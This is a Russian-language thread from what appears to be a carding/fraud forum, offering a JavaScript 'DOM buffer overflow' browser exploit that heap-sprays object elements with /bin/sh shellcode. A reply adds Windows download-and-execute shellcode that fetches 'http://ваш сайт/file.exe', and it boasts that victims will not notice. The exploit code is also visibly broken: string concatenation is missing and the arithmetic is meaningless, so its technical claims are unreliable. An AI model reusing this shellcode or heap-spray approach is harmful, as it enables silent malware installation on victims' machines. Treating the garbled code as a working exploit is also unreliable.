1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

JavaScript DOM Tree BufferOverflow Exploit

Тема в разделе "Программирование", создана пользователем AJ1, 22 апр 2013.

  1. TopicStarter Overlay
    AJ1

    AJ1

    Регистрация:
    19 фев 2013
    Сообщения:
    246
    Симпатии:
    351
    Уязвимость в DOM-парсере JavaScript, позволяющая переполнить буфер, с помощью создания "тяжелых" элементов object c заведомо неправильно заполнеными полями name,clsid,id,src

    Эксплойт сильно нагружает систему, и потребляет очень много оперативной памяти, но через некоторое время таблица DOM перегружается даже в Google Chrome

    Код:
    <!DOOCTYPE html>
    <html>
    <head></head>
    <body>
    </body>
    </html>
    <script>
    var createAppendaryObject = function (dataSpray)
        {
            var docObject = document.createElement("object");
            docObject.src = dataSpray;
            docObject.clsid = "{AC68:91UIX:733O:3722:22TE2}";
            docObject.id = "00000000";
            docObject.name = "\x402\x32\x100\x77\x63\x116";
           
            document.body.appendChild(docObject);
        }
       
    var tmpBuffArray = [65535*0x111];
    var shellCode = "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd"
        "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69"
        "\x6e\x2f\x73\x68";
     
    var count = 65536;
    while(count<0x111*65536)
    {
        for(var i=0;i<tmpBuffArray[0];i++)
        {
        var HeapData = ((((65535*0x111)^65535)|967382^420233)*65535*65535);
        HeapData = HeapData*HeapData;
        createAppendaryObject(HeapData*tmpBuffArray[0]+shellCode);
        count++;
        }
    }
     
    </script>
     
    • Like Like x 6
    Метки:
  2. nitob

    nitob

    Регистрация:
    21 мар 2013
    Сообщения:
    42
    Симпатии:
    29
    Сам то пробывал его?
    А так в таком случае вот вам шелкод для него
    “\xEB\x50\x31\xF6\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E”
    “\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x67?
    “\xE3\xEC\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99?
    “\x02\x17\xC1\xCA\x04\xAE\x75\xF8\x3B\x54\x24\x04\xE0\xE4\x75\xCE”
    “\x8B\x53\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C”
    “\x97\xC3\x68\x8E\x48\x8B\x63\xE8\xA6\xFF\xFF\xFF\x66\xB8\x6C\x6C”
    “\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xFF\xD5\x68\x83?
    “\x2B\x76\xF6\xE8\x8A\xFF\xFF\xFF\xEB\x21\x50\xFF\xD5\x68\xE7\xC4?
    “\xCC\x69\xE8\x7B\xFF\xFF\xFF\x50\x4C\x4C\x4C\x4C\xFF\xD5\x68\x77?
    “\xA6\x60\x2A\xE8\x6A\xFF\xFF\xFF\x50\xFF\xD5\x50\x68\x2E\x65\x78?
    “\x65\x68\x43\x3A\x5C\x78\x50\x50\x89\xE3\x80\xC3\x08\x53\xE8\xC7?
    “\xFF\xFF\xFFhttp://ваш сайт/file.exe”;
     
    • Like Like x 1
  3. nitob

    nitob

    Регистрация:
    21 мар 2013
    Сообщения:
    42
    Симпатии:
    29
    Эксплоит это программа или фрагмент кода, пишется под извесные или неизвесные ошибки в праграммном коде, обычно используются для повышения привелегий и последовательного выполнения команд. Тупо можно через браузер к примеру залить какой нибудь фаил, и жертва о бетом даже не узнает. Но это Я вобще легкий пример привел, тема вобще достаточно сложная и затрачивает много времени. А лучше посмотри в wikipedia
     
    • Like Like x 1

Поделиться этой страницей

Загрузка...